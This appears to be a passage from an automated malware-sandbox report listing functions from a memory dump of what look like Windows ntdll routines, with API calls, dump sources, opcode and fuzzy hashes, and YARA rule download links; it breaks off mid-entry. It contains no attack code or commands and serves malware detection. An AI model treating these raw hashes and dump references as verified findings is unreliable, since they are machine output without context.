                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentServiceSession$CriticalLeaveSection
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3230880662-0
                                                                                                                            • Opcode ID: 33c570bf6396c96a4df5186f81a672d5e69cc6eba04c948961cdfdf147ca58f9
                                                                                                                            • Instruction ID: 6a087cb636c756ac1565da8401837b4735e8d37c69561fa2d632a711c1f07618
                                                                                                                            • Opcode Fuzzy Hash: 33c570bf6396c96a4df5186f81a672d5e69cc6eba04c948961cdfdf147ca58f9
                                                                                                                            • Instruction Fuzzy Hash: 4F112636788A98FBE3118339CD85F1237E8DF91B54F1510A6B9008B3E0DEACD801C271
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2546A7, Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.1105(?,00000000,00000030,?,00000000,?,6B23F5F2,?,00000024,00000000,?), ref: 6B2546CB
                                                                                                                            • memcpy.1105(00000000,00000000,00000000,00000024,?,00000000,00000030,?,00000000,?,6B23F5F2,?,00000024,00000000,?), ref: 6B2546F4
                                                                                                                            • RtlFreeHeap.1105(?,00000000,00000000,00000030,?,00000000,?,6B23F5F2,?,00000024,00000000,?), ref: 6B254725
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocateFreememcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4030768257-0
                                                                                                                            • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                                                            • Instruction ID: 7374eea6a435010ecce7488ecda3de44f43a3cbac913be02a40a09717d2f73b9
                                                                                                                            • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                                                            • Instruction Fuzzy Hash: AB110272904208BBCB058F6C98808BEF7F9EF85304F1080AAF94487351DB358D61C3A4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2137F5, Relevance: 4.6, APIs: 3, Instructions: 57memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(6B2C8550,?,?,?,6B1EED20,6B2C84D8,6B2C84D8,6B2217F0,00000000,?,6B1FF715,6B1FF5C0,?,?,?,00000001), ref: 6B213808
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(6B2C8550,?,?,?,6B1EED20,6B2C84D8,6B2C84D8,6B2217F0,00000000,?,6B1FF715,6B1FF5C0,?,?,?,00000001), ref: 6B21384B
                                                                                                                            • RtlFreeHeap.1105(?,00000000,00000000,?,?,?,6B1EED20,6B2C84D8,6B2C84D8,6B2217F0,00000000,?,6B1FF715,6B1FF5C0,?,?), ref: 6B213863
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$AcquireFreeHeapRelease
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3645524765-0
                                                                                                                            • Opcode ID: 072eaa15c6f9d8e3e53943eae2dfec17b020fda9fd723f66ef3f92ca529c45f5
                                                                                                                            • Instruction ID: c09d768056d321a74f872a31362f4b562b21e5b2668fcf31216f24fa6f495526
                                                                                                                            • Opcode Fuzzy Hash: 072eaa15c6f9d8e3e53943eae2dfec17b020fda9fd723f66ef3f92ca529c45f5
                                                                                                                            • Instruction Fuzzy Hash: 75012BB294D515BBC3378B1E9980E16BBF7FF81B6171348A9E6098B290D738C801C7C0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D3E80, Relevance: 4.6, APIs: 3, Instructions: 55nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(00000000,?,?), ref: 6B1D3EAA
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(00000000,?,?), ref: 6B230245
                                                                                                                            • ZwTraceEvent.1105(?,00000402,00000008,?,00000000,?,?), ref: 6B23026C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentServiceSession$EventTrace
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4061387822-0
                                                                                                                            • Opcode ID: 603e0b794e58a45c0b93f5640aa8ebcd03c6233415c93d9a9ed5b2c56ffb19b3
                                                                                                                            • Instruction ID: 5d8984d56bff0db503f3db3f163a5fe9b1d92b80364fac97772adab1560922b6
                                                                                                                            • Opcode Fuzzy Hash: 603e0b794e58a45c0b93f5640aa8ebcd03c6233415c93d9a9ed5b2c56ffb19b3
                                                                                                                            • Instruction Fuzzy Hash: AD11A0B5A41658AFC721CFA9D885BAAB7F8BB49700F1500BAE9049B691DA38D901C760
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B29138A, Relevance: 4.5, APIs: 3, Instructions: 48nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • memset.1105(?,00000000,00000030,7FFE0380,?,?,00001000,0000003C,000000FF,?,00000003,00000014,00000014), ref: 6B2913AA
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(?,7FFE0380,?,?,00001000,0000003C,000000FF,?,00000003,00000014,00000014), ref: 6B2913CD
                                                                                                                            • ZwTraceEvent.1105(?,00020402,00000010,?,?,7FFE0380,?,?,00001000,0000003C,000000FF,?,00000003,00000014,00000014), ref: 6B2913FA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentEventServiceSessionTracememset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4204234202-0
                                                                                                                            • Opcode ID: 7f0157c3a3febffb2fe4cba1726604d15d1b50225b274ad25d9733ac915e5e92
                                                                                                                            • Instruction ID: 22d4f45109e23825dac2508a34ce9e82770d400d5557016a1844cd1ed76998cc
                                                                                                                            • Opcode Fuzzy Hash: 7f0157c3a3febffb2fe4cba1726604d15d1b50225b274ad25d9733ac915e5e92
                                                                                                                            • Instruction Fuzzy Hash: DC019271A4521CAFCB00DFA9D886EAEB7F8EF44710F404056B904EB380D778DA41CB95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D70C0, Relevance: 4.5, APIs: 3, Instructions: 48memorynativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ZwClose.1105(?,7FFFFFFF,6B2217F0,?,6B1D7096,7FFFFFFF,?,?,?,?,6B26430E,?,6B2B08D0,00000008,6B209B80,?), ref: 6B1D710A
                                                                                                                            • RtlFreeHeap.1105(?,00000000,7FFFFFFF,7FFFFFFF,6B2217F0,?,6B1D7096,7FFFFFFF,?,?,?,?,6B26430E,?,6B2B08D0,00000008), ref: 6B1D7126
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseFreeHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1266433183-0
                                                                                                                            • Opcode ID: 06d75836c9573aa0e55f1f59fba811012c8e74f5e68e5d7ca759bd447d74ee88
                                                                                                                            • Instruction ID: fe74ba0c890823a6587189e664ab2e42c22a52e989a7de83fc0b94922b8c256f
                                                                                                                            • Opcode Fuzzy Hash: 06d75836c9573aa0e55f1f59fba811012c8e74f5e68e5d7ca759bd447d74ee88
                                                                                                                            • Instruction Fuzzy Hash: 7811AD72450B02EFD7218F18C880B12B7E5FF51722F15C8AAD4994A5A2C77CE881CB50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2914FB, Relevance: 4.5, APIs: 3, Instructions: 48nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • memset.1105(?,00000000,00000030,-00010018), ref: 6B29151B
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(?,-00010018), ref: 6B29153E
                                                                                                                            • ZwTraceEvent.1105(?,00020402,00000010,?,?,-00010018), ref: 6B29156B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentEventServiceSessionTracememset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4204234202-0
                                                                                                                            • Opcode ID: c2477c409ba9dc1e35cc590651d939152c24108763126238488e43233e11a449
                                                                                                                            • Instruction ID: 4abaaee06e9798d9755ae304765c5217dca00b7d4a1b18c62efe60c750be840a
                                                                                                                            • Opcode Fuzzy Hash: c2477c409ba9dc1e35cc590651d939152c24108763126238488e43233e11a449
                                                                                                                            • Instruction Fuzzy Hash: E2018071A4125CABCB00DF69D846EAEB7F8EF45710F404056B914EB380D678DA41CB94
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B28FE3F, Relevance: 4.5, APIs: 3, Instructions: 46nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • memset.1105(?,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,6B2A10FA,00000000), ref: 6B28FE5F
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(?,?,?,?,?,?,?,?,?,?,?,?,6B2A10FA,00000000,00008000,00000000), ref: 6B28FE7C
                                                                                                                            • ZwTraceEvent.1105(?,00020402,00000010,?,?,?,?), ref: 6B28FEA9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentEventServiceSessionTracememset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4204234202-0
                                                                                                                            • Opcode ID: 621330796c308d980e61a4214d451c3656aba75af0969fba8c88e03d2f35c146
                                                                                                                            • Instruction ID: 79da1bf63910bc1b794389e8e3093f61a1432dddad03911a37e92118181fc28a
                                                                                                                            • Opcode Fuzzy Hash: 621330796c308d980e61a4214d451c3656aba75af0969fba8c88e03d2f35c146
                                                                                                                            • Instruction Fuzzy Hash: EF017171E4524CABDB14DBA9D846EAFB7F8EF44714F004066B904AB381DA789901C795
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1F746D, Relevance: 4.5, APIs: 3, Instructions: 31memorynativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ZwClose.1105(00000000,6B1F70EF,00000024,00000000,?), ref: 6B23F93A
                                                                                                                            • RtlFreeHeap.1105(?,00000000,?,00000000,6B1F70EF,00000024,00000000,?), ref: 6B23F94E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseFreeHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1266433183-0
                                                                                                                            • Opcode ID: cfe78bdf1c35c93010787045edb16f97465862953d0b92fa0ddeb1a3a80fc141
                                                                                                                            • Instruction ID: e4f8be9c7aa5022c5a7666d63f8d859663ea3055119e67236fb51e00c7e25c5e
                                                                                                                            • Opcode Fuzzy Hash: cfe78bdf1c35c93010787045edb16f97465862953d0b92fa0ddeb1a3a80fc141
                                                                                                                            • Instruction Fuzzy Hash: 5AF0E934D54148BACB01877CC890F5AFBF9AF05755F01029BD450A7160E72DD803C795
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D2CDB, Relevance: 4.5, APIs: 3, Instructions: 21nativememoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlFreeHeap.1105(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,6B1D2CD7), ref: 6B1D2CFB
                                                                                                                            • ZwClose.1105(?,?,?,?,?,?,?,?,?,?,?,6B1D2CD7), ref: 6B1D2D04
                                                                                                                            • ZwSetEvent.1105(00000000,00000000,?,?,?,?,?,?,?,?,?,?,6B1D2CD7), ref: 6B22F975
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseEventFreeHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4036969103-0
                                                                                                                            • Opcode ID: a2301cbb80807bd86986fb20a83a6222ed7f6f329ba40549649f5f350f115ca8
                                                                                                                            • Instruction ID: 77e32f728d8a52706dabeb9123d2ccc7ac2003faecd8dcdf39669899d76c40f7
                                                                                                                            • Opcode Fuzzy Hash: a2301cbb80807bd86986fb20a83a6222ed7f6f329ba40549649f5f350f115ca8
                                                                                                                            • Instruction Fuzzy Hash: 3CE0C2314A8614FFDB311B38ED4AF8277F5BF01B52F11056AE180550B48B7D9C92CB80
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B20A185, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlFreeHeap.1105(?,00000000,00000000,00000000,6B20A12F,?,?,6B2C85EC,6B2B01E0,0000001C,6B1D3075,?,00000000,00008000), ref: 6B20A1BC
                                                                                                                              • Part of subcall function 6B1F0010: RtlAcquireSRWLockExclusive.1105(?,?,?,?,?,?,6B29CA01,000000FE,00000001,?,?,?,?,?,00000000), ref: 6B1F002E
                                                                                                                              • Part of subcall function 6B1F0010: RtlReleaseSRWLockExclusive.1105(?,?,?,?,?,?,?,6B29CA01,000000FE,00000001,?,?,?,?,?,00000000), ref: 6B1F0041
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$AcquireFreeHeapRelease
                                                                                                                            • String ID: g,k
                                                                                                                            • API String ID: 3645524765-2241204141
                                                                                                                            • Opcode ID: f4a6d59d48c805975f7282e3f2add5e7e60617d08e018b2478f005334d262b07
                                                                                                                            • Instruction ID: 5599b79828c4a54be3c696d80f0a85c742fa49075adc2c0b2ae9168265ec43c4
                                                                                                                            • Opcode Fuzzy Hash: f4a6d59d48c805975f7282e3f2add5e7e60617d08e018b2478f005334d262b07
                                                                                                                            • Instruction Fuzzy Hash: FCD0C22116104C2AC72F075088D8B72B3EBA78A740F300A1EE0070F594DF6C88D9C247
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2016E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6B201710: RtlAcquireSRWLockExclusive.1105(00000001,?,?,00000001,6B2016ED,?,6B201630,C0000001,?,?,6B20161A,C0000001,?,?,6B2C6D80,00000000), ref: 6B201727
                                                                                                                              • Part of subcall function 6B201710: RtlReleaseSRWLockExclusive.1105(00000001,00000001,?,?,00000001,6B2016ED,?,6B201630,C0000001,?,?,6B20161A,C0000001,?,?,6B2C6D80), ref: 6B201740
                                                                                                                            • RtlAllocateHeap.1105(?,00000000,00000020,?,6B201630,C0000001,?,?,6B20161A,C0000001,?,?,6B2C6D80,00000000,00000000), ref: 6B201707
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$AcquireAllocateHeapRelease
                                                                                                                            • String ID: g,k
                                                                                                                            • API String ID: 614792542-2241204141
                                                                                                                            • Opcode ID: 5040066bbeee9e8c58a180ecc466f20357c40840bba81b4e27b0c12ded0d88c7
                                                                                                                            • Instruction ID: 70d6fc55b1a3c224dd257b82f034cf9c1f08120f8c6b60f12f0b91fac277e9ff
                                                                                                                            • Opcode Fuzzy Hash: 5040066bbeee9e8c58a180ecc466f20357c40840bba81b4e27b0c12ded0d88c7
                                                                                                                            • Instruction Fuzzy Hash: 0ED05E31100145A6DB194A209C85B1522D6AB8479BF3400ACB116494D0CFACC9D2E148
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1E8A0A, Relevance: 3.1, APIs: 2, Instructions: 120COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlImageNtHeaderEx.1105(00000001,?,00000000,00000000,?,00000040,-00000054,00000000), ref: 6B1E8A6A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: HeaderImage
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1925295642-0
                                                                                                                            • Opcode ID: 8237bd748ce88c45669fc0782da60f5e5f3f792cba5b90a2f01b429e0e6bc439
                                                                                                                            • Instruction ID: 084387df77aa2f757a63884baedcb68d74baaeaa6f7f982b5c04ce3e0ed2ffb6
                                                                                                                            • Opcode Fuzzy Hash: 8237bd748ce88c45669fc0782da60f5e5f3f792cba5b90a2f01b429e0e6bc439
                                                                                                                            • Instruction Fuzzy Hash: 964195B4A4472CABDB24CF59CC88AA9B3F4FB94704F1146E9D818D7241E7789E81CF60
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B201520, Relevance: 3.1, APIs: 2, Instructions: 115COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 17c6bb72c6b9f8ae35f877306a377810b4e9f8919ef5a6278cc92d1a99af2e76
                                                                                                                            • Instruction ID: 4fb3e230ca1ee7167f959e9a457c0f3d612eab78208701ab97ce7e87db1d4ff4
                                                                                                                            • Opcode Fuzzy Hash: 17c6bb72c6b9f8ae35f877306a377810b4e9f8919ef5a6278cc92d1a99af2e76
                                                                                                                            • Instruction Fuzzy Hash: 1841AC31A696598FD325CE28C8D0B1677F5BB49B1AF0446ADF8A28B6C0DB3CD480CB41
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2061A0, Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b6a286a035d948a3827195230ef1e2739ab75234ba391f6d8b073b62bd657e58
                                                                                                                            • Instruction ID: 1ad8ba1d9d272203a33e2a86eff45b95bf588bd946d846de9d9ab93766eb9908
                                                                                                                            • Opcode Fuzzy Hash: b6a286a035d948a3827195230ef1e2739ab75234ba391f6d8b073b62bd657e58
                                                                                                                            • Instruction Fuzzy Hash: 9B318F716097068FD314CF19C880B16F7E5FB88B00F0149ADE9A49B7A1DB78D844CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B20DF4C, Relevance: 3.1, APIs: 2, Instructions: 62memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlFreeHeap.1105(?,00000000,?,00000000,?,?,?,?,?,6B1D3DAD,?,00000000,6B2AF4D0,00000084,6B1D3A18,00000000), ref: 6B20DFB0
                                                                                                                            • RtlWakeAddressAllNoFence.1105(00000000), ref: 6B20DFCC
                                                                                                                              • Part of subcall function 6B1DA745: RtlAcquireSRWLockExclusive.1105(?,?,00000000,?,6B20DFD8,00000000,?,?,?,?,?,6B1D3DAD,?,00000000,6B2AF4D0,00000084), ref: 6B1DA757
                                                                                                                              • Part of subcall function 6B1DA745: RtlReleaseSRWLockExclusive.1105(?,?,?,00000000,?,6B20DFD8,00000000,?,?,?,?,?,6B1D3DAD,?,00000000,6B2AF4D0), ref: 6B1DA774
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$AcquireAddressFenceFreeHeapReleaseWake
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4187599678-0
                                                                                                                            • Opcode ID: eb68034816a1b22d4d42b68bfa87daaead973648ca8f5c3e9f107cae683dcf72
                                                                                                                            • Instruction ID: f519f4a215431c77ac76c64e7818a8944f7dcb9a710def431b37bc314babd85b
                                                                                                                            • Opcode Fuzzy Hash: eb68034816a1b22d4d42b68bfa87daaead973648ca8f5c3e9f107cae683dcf72
                                                                                                                            • Instruction Fuzzy Hash: AE11B2712526099FC719CF25C484F66B7F6FF45361F0181ADE8098B6A0EB74EC01CB90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1EFC01, Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c23f0ae734410a9d73bf579c07f5b5887f97bded13253a1d8847541bb4dd6aa6
